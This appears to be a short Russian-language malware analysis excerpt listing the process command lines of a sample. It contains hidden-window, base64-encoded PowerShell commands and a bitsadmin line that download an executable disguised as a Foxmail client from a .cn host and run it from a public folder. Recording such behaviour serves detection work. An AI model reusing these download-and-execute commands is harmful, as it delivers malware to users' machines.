Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EncodedCommand YgBpAHQAcwBhAGQAbQBpAG4AIAAvAHQAcgBhAG4AcwBmAGUAcgAgAHQAYQBzAGsAMQAgAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBkAGUAbQBkAHIAZwBoAGsAZAAuAGMAbgAvAGYAbwB4AG0AYQBpAGwALQBjAGwAaQBlAG4AdAAuAGUAe...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EncodedCommand QwA6AFwAVQBzAGUAcgBzAFwAUAB1AGIAbABpAGMAXABNAHUAcwBpAGMAXABTAGEAbQBwAGwAZQAgAE0AdQBzAGkAYwBcAGYAbwB4AG0AYQBpAGwALQBjAGwAaQBlAG4AdAAuAGUAeABlAA==
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EncodedCommand YgBpAHQAcwBhAGQAbQBpAG4AIAAvAHQAcgBhAG4AcwBmAGUAcgAgAHQAYQBzAGsAMQAgAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBkAGUAbQBkAHIAZwBoAGsAZAAuAGMAbgAvAGYAbwB4AG0AYQBpAGwALQBjAGwAaQBlAG4AdAAuAGUAe...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EncodedCommand QwA6AFwAVQBzAGUAcgBzAFwAUAB1AGIAbABpAGMAXABNAHUAcwBpAGMAXABTAGEAbQBwAGwAZQAgAE0AdQBzAGkAYwBcAGYAbwB4AG0AYQBpAGwALQBjAGwAaQBlAG4AdAAuAGUAeABlAA==' (со скрытым окном)
- '<SYSTEM32>\bitsadmin.exe' /transfer task1 http://www.demdrghkd.cn/foxmail-client.exe C:\Users\Public\Music\Sample Music\foxmail-client.exe